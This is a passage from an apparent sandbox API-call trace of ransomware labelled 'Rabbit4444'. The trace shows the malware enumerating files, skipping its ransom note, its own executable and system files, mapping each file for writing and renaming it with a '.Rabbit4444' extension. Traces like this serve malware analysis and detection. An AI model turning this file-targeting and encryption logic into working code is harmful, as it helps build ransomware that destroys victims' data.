(hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7b0, lpName=0x0) returned 0x298 [0057.478] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7b0) returned 0x70000 [0057.479] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.479] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.479] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.479] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0057.479] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.479] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0057.479] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.479] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.479] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14879023883) returned 1 [0057.480] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0057.480] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0057.480] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.480] CloseHandle (hObject=0x298) returned 1 [0057.480] CloseHandle (hObject=0x278) returned 1 [0057.480] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms.Rabbit4444") returned 179 [0057.480] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_maps_deleteall.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_maps_deleteall.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.481] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eafee83, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2eafee83, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms", cAlternateFileName="AAAC5D~1.SET")) returned 1 [0057.481] lstrcmpiW (lpString1="AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.481] lstrcmpiW (lpString1="AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.481] lstrcmpiW (lpString1="AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.481] lstrcmpiW (lpString1="AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms", lpString2=".") returned 1 [0057.481] lstrcmpiW (lpString1="AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms", lpString2="..") returned 1 [0057.481] lstrcmpiW (lpString1="AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms", lpString2="windows") returned -1 [0057.481] lstrcmpiW (lpString1="AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.481] lstrcmpiW (lpString1="AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.481] lstrcmpiW (lpString1="AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms", lpString2="boot") returned -1 [0057.481] lstrcmpiW (lpString1="AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.481] lstrcmpiW (lpString1="AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.481] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms") returned="AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms" [0057.481] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.481] lstrlenW (lpString="AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms") returned 62 [0057.481] lstrlenW (lpString="Rabbit4444") returned 10 [0057.481] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.481] lstrlenW (lpString=".dll") returned 4 [0057.482] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.482] lstrlenW (lpString=".lnk") returned 4 [0057.482] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.482] lstrlenW (lpString=".ini") returned 4 [0057.482] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.482] lstrlenW (lpString=".sys") returned 4 [0057.482] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.482] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_maps_download_add_package.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.482] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.482] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14879276656) returned 1 [0057.482] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1247) returned 1 [0057.482] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0057.482] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0057.482] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x298 [0057.483] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x70000 [0057.484] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.484] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0057.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.484] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0057.484] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.485] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0057.485] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.485] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0057.485] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14879543460) returned 1 [0057.485] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0057.485] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0057.485] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.485] CloseHandle (hObject=0x298) returned 1 [0057.485] CloseHandle (hObject=0x278) returned 1 [0057.485] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms.Rabbit4444") returned 190 [0057.485] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_maps_download_add_package.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_maps_download_add_package.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.486] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2edf9dcb, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2edf9dcb, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms", cAlternateFileName="AA578E~1.SET")) returned 1 [0057.495] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.495] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.495] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.495] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms", lpString2=".") returned 1 [0057.495] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms", lpString2="..") returned 1 [0057.495] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms", lpString2="windows") returned -1 [0057.495] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.495] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.495] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms", lpString2="boot") returned -1 [0057.495] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.495] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.495] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms") returned="AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms" [0057.495] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.495] lstrlenW (lpString="AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms") returned 53 [0057.495] lstrlenW (lpString="Rabbit4444") returned 10 [0057.495] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.495] lstrlenW (lpString=".dll") returned 4 [0057.495] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.495] lstrlenW (lpString=".lnk") returned 4 [0057.495] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.495] lstrlenW (lpString=".ini") returned 4 [0057.495] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.496] lstrlenW (lpString=".sys") returned 4 [0057.496] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.496] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_misc_resetyourpc.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.496] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.496] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14880661066) returned 1 [0057.496] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1220) returned 1 [0057.496] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0057.496] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0057.496] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d0, lpName=0x0) returned 0x298 [0057.497] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d0) returned 0x70000 [0057.498] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.498] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0057.498] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.498] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0057.498] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.498] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0057.498] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.498] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0057.498] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14880899748) returned 1 [0057.498] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0057.498] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0057.498] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.498] CloseHandle (hObject=0x298) returned 1 [0057.499] CloseHandle (hObject=0x278) returned 1 [0057.499] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms.Rabbit4444") returned 181 [0057.499] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_misc_resetyourpc.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_misc_resetyourpc.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.499] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ef774e9, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2ef774e9, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x523, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms", cAlternateFileName="AA2327~1.SET")) returned 1 [0057.499] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.499] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.499] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.499] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms", lpString2=".") returned 1 [0057.499] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms", lpString2="..") returned 1 [0057.499] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms", lpString2="windows") returned -1 [0057.499] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.500] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.500] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms", lpString2="boot") returned -1 [0057.500] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.500] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.500] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms") returned="AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms" [0057.500] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.500] lstrlenW (lpString="AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms") returned 69 [0057.500] lstrlenW (lpString="Rabbit4444") returned 10 [0057.500] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.500] lstrlenW (lpString=".dll") returned 4 [0057.500] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.500] lstrlenW (lpString=".lnk") returned 4 [0057.500] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.500] lstrlenW (lpString=".ini") returned 4 [0057.500] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.500] lstrlenW (lpString=".sys") returned 4 [0057.500] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.500] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_misc_rollbackyourpc_previewbuild.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.501] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.501] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14881136870) returned 1 [0057.501] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1315) returned 1 [0057.501] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0057.501] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0057.501] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x830, lpName=0x0) returned 0x298 [0057.502] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x830) returned 0x70000 [0057.503] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.503] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0057.503] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.503] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0057.503] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.503] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0057.503] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.503] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0057.503] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14881391536) returned 1 [0057.503] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0057.503] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0057.503] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.503] CloseHandle (hObject=0x298) returned 1 [0057.503] CloseHandle (hObject=0x278) returned 1 [0057.503] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms.Rabbit4444") returned 197 [0057.504] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_misc_rollbackyourpc_previewbuild.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_misc_rollbackyourpc_previewbuild.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.515] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f141176, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2f141176, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2339a047, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x50b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms", cAlternateFileName="AABE84~1.SET")) returned 1 [0057.515] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.515] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.515] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.515] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms", lpString2=".") returned 1 [0057.515] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms", lpString2="..") returned 1 [0057.515] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms", lpString2="windows") returned -1 [0057.515] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.515] lstrcmpiW 